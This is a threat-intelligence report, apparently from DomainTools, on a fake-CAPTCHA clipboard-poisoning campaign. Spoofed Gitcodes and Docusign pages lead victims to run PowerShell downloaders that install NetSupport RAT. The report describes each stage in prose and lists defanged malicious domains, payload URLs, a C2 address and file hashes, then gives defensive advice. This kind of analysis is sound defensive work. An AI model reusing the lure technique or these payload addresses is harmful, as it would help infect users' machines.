How Threat Actors Exploit Human Trust: A Breakdown of the 'Prove You Are Human' Malware Scheme

This report details a malicious campaign that uses deceptive websites, including spoofed Gitcodes and fake Docusign verification pages, to trick users into running malicious PowerShell scripts on their Windows machines. Victims are lured into copying and pasting these scripts into their Windows Run prompt, which then download and execute multiple stages of additional scripts, ultimately leading to the installation of the NetSupport RAT (remote access trojan).

Malicious Multi-Stage Downloader Powershell Scripts Identified

Our team identified malicious multi-stage downloader Powershell scripts hosted on multiple themed websites including Gitcodes and fake Docusign captcha verifications. These sites attempt to deceive users into copying and running an initial powershell script on their Windows Run command. Upon doing so, the powershell script downloads another downloader script and executes on the system, which in turn retrieves additional payloads and executes them eventually installing NetSupport RAT on the infected machines.

Malicious Powershell Scripts Hosted on Gitcodes

Malicious Powershell scripts were found to be hosted on instances of Gitcodes sites for the purpose of downloading second stage Powershell scripts. The second stage also functioned as downloaders, making 3 or more web requests to retrieve and execute a third stage of scripts from other domains, which then retrieve and run a fourth stage resulting in NetSupport RAT running on the victim host. 

Domain: gitcodes[.]org resolving website with a Gitcodes service running titled: “Gitcodes – #1 paste tool since 2002!” Gitcodes is populated with a malicious Powershell script that concatenates multiple strings to form a domain. It then initiates a web request using the specified user agent and domain to download and run the returned script.

The retrieved script from tradingviewtool[.]com subsequently invokes additional web requests to download 3 files from a different domain “tradingviewtoolz[.]com” and also initiates multiple requests to tradingviewtool[.]com. Initially the script reaches out to https[:]//tradingviewtool[.]com/info2.php, which appears to be a method of checking in with the computer name to record the initial execution of the script. Once the script completes its intended purpose and cleans up its local artifacts, it calls out to the same domain again at https[:]//tradingviewtool[.]com/info3.php with the computer name likely indicating the host is infected.

As seen in the capture above, this second stage script performs a series of malicious actions to install a payload and make it persistent, all while trying to hide its activities and deceive the user. The script essentially functions as a downloader, retrieving NetSupport RAT and running it on the system. The three files contain a legitimate 7zip executable, which it uses to unpack “client32.exe” and creates a new entry in the Windows Registry’s “Run” key for the current user for it. This ensures that `client32.exe` will automatically start every time the user logs in, establishing persistence for the malware. Naming it “My Support” is an attempt to make it look less suspicious in lists of startup programs.

Uncovering the Broader Malware Ecosystem Behind the Campaign

The observed infrastructure had a wider variety though the combination of registration and website configurations as well as the repeat use of malicious payloads enabled the identification of additional lure sites serving similar malicious downloader scripts.

Registrar:

• Cloudflare
• NameCheap
• NameSilo

NameServer: 

• cloudflare[.]com
• luxhost[.]org
• namecheaphosting[.]com

SSL Issuer: WE1

Website Title contains Gitcodes

Example 1:

Example 2:

Fake Docusign CAPTCHAs Used to Deploy NetSupport RAT

Pivoting on the Netsupport RATs being distributed and the associated infrastructure, additional malware distribution domains were identified including Docusign spoofed websites. Similar to the Gitcodes sites, multiple stages of script downloaders were observed resulting in Netsupport RATs being installed on victim machines.

An initial payload retrieves a “s.php” file from a domain spoofing as docusign. It then unzips the file and launches a script within it.

docusign.sa[.]com

The main malicious functionality is present in “docusign.sa[.]com/verification/s.php,” which is initially ROT13 encoded, likely to avoid signature detections and obfuscation. ROT13 or rotate 13, is a form of Caesar Cipher in which a simple letter substitution replaces each letter with the 13th letter after it in the alphabet. Completing this operation twice effectively decodes the text.

The page is designed to look like a Cloudflare “Checking your browser” / CAPTCHA page, mixed with Docusign branding. The initial screen presents a fake CAPTCHA checkbox (.captcha-check). Upon clicking, “s.php?an=0” is triggered, likely for logging the click attempt. The page then initiates Clipboard Poisoning, in which a “unsecuredCopyToClipboard()” function is called, copying an encoded multi-layered string to the user’s clipboard. The user is instructed to (Win+R, Ctrl+V, Enter) or in other words, open their Window’s Run prompt, copy in the malicious script, and run it. 

Also on the s.php page, after the clipboard poisoning, an interval timer is set to make an AJAX GET request to c.php every second. If c.php returns “1,” the current page (s.php) reloads (window.location.reload()). This is likely a C2 (Command and Control) mechanism waiting for the victim to paste and run the PowerShell script on their machine. 

The string copied to the user’s clipboard decodes to the following PowerShell script:

This script downloads a persistence script, “wbdims.exe,” from Github. It then starts it as a process, creates a COM object for Windows Script Host, which it then uses to create a shortcut in the Startup folder to automatically execute when the user logs in.

While this payload was no longer available during the time of investigation, the expectation is that it checks in with the delivery site via “docusign.sa[.]com/verification/c.php.” Upon doing so, it triggers a refresh in the browser for the page to display the content of “docusign.sa[.]com/verification/s.php?an=1.”

The initial clipboard poisoning delivered a first-stage PowerShell downloader. The refresh of s.php (to s.php?an=1) delivers this second-stage PowerShell script, which then downloads and executes a third-stage payload (jp2launcher.exe from the zip file) retrieved by passing “an=2” argument to the same php page “docusign.sa[.]com/verification/s.php?an=2.”

Downloaded Zip File: 254732635529a0567babf4f78973ad3af5633fd29734ea831e5792292bbf16cd

The script then unzips the file and starts a process called “jp2launcher.exe”, which subsequently, goes through additional stages of file retrievals and executions resulting in a NetSupport RAT (3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7) being installed on the victim machine with these associated network actions:

http[:]//mhousecreative[.]com

http[:]//170.130.55[.]203:443/fakeurl.htm

In summary, the fake Docusign website is likely distributed via phishing attempts over email and/or social media. It is the beginning of an elaborate multi-stage NetSupport RAT delivery method that relies upon deceiving users into verifying they are humans by copying and running a malicious powershell script on their machines. The multiple stages of scripts downloading and running scripts that download and run yet more scripts is likely an attempt to evade detection and be more resilient to security investigations and takedowns. 

By breaking the attack into small, distinct steps, the attacker increases the chance that at least one stage will slip past initial signature-based defenses. Additionally, the early phase persistence files appear to be short lived or quickly identified and taken down, however the subsequent later stages appear to be active for longer time frames. This demonstrates the method’s somewhat effective disposable pawn strategy with a more resilient late game setup. 

The Widening Scope of Clipboard Poisoning Attacks

While the use of ROT13 encoding can make some detections more difficult, particularly when depending on services that attempt to preprocess server scan data, the samples themselves allow for more unique identification such as the consistent use of the same strings and comment values within the php code. 

Pivots on the Clickboard Poisoning scripts identified several other nearly identical instances of the code present on a wider range of spoofed content including Okta and popular media apps. Additionally, Discord and GitHub were also identified as being utilized for hosting the next stage malware such as in the following example.

https[:]//oktacheck.it[.]com/s.php https[:]//loyalcompany[.]net/s.php https[:]//hubofnotion[.]com/steps.php https[:]//raw.githubusercontent[.]com/MIGS2023/000/main/sihost.exe https[:]//raw.githubusercontent[.]com/MIGS2023/000/main/svchost.exe https[:]//cdn.discordapp[.]com/attachments/1212800072570241127/1213022984775106570/Netflix.scr?ex=65f3f1b5&is=65e17cb5&hm=a8b4797b7e82709d835f1e24a0118e83d76c69be8338e340c7b850c20f07034d& https[:]//cdn.discordapp[.]com/attachments/1212800072570241127/1213022984775106570/Spotify.scr?ex=65f3f1b5&is=65e17cb5&hm=a8b4797b7e82709d835f1e24a0118e83d76c69be8338e340c7b850c20f07034d&

While attribution of this campaign of activity is unclear, pivots on the associated infrastructure and malware identified reuse of associated NetSupport RAT hashes, similar delivery URL patterns, and similar domain naming and registration patterns observed in a previously reported cluster of SocGholish activity. Notably, the techniques involved are commonplace and NetSupport Manager is a legitimate administration tool known to be leveraged as a RAT by multiple threat groups such as FIN7, Scalert Goldfinch, STORM-0408 and others. 

Key Takeaways and Security Recommendations

This analysis highlights a sophisticated and persistent malicious campaign designed to deliver the NetSupport RAT through deceptive means, primarily leveraging spoofed Gitcodes and fake Docusign verification pages. The attackers employ a multi-stage approach, using seemingly innocuous “verify you are human” CAPTCHAs and malicious PowerShell scripts disguised as legitimate prompts to trick users into infecting their own machines. This method capitalizes on user trust and familiarity with common online interactions, such as document verification and code sharing platforms.

Key Security Recommendations:

• Exercise extreme caution when prompted to copy and paste scripts into the Windows Run prompt: legitimate websites rarely, if ever, require users to execute PowerShell commands directly. Always verify the source and legitimacy of any such requests.
• Be wary of CAPTCHA-like verifications that instruct you to run commands: genuine CAPTCHAs do not involve running scripts. Any prompt to do so should be treated as highly suspicious.
• Verify the authenticity of websites: Double-check the URL and SSL certificates of websites, especially those that request sensitive actions or information. Be cautious of lookalike domains.

This campaign serves as a stark reminder of the evolving threat landscape. Attackers are continuously refining their techniques to exploit user behavior and bypass traditional security measures. Vigilance, user education, and proactive security practices are paramount in defending against these increasingly sophisticated threats. The “self-infect” tactic, while seemingly simple, can be highly effective, emphasizing the need for users to remain skeptical and verify all interactions before acting.

---

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/prove-you-are-human.csv

If the community has any additional input, please let us know.

---

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.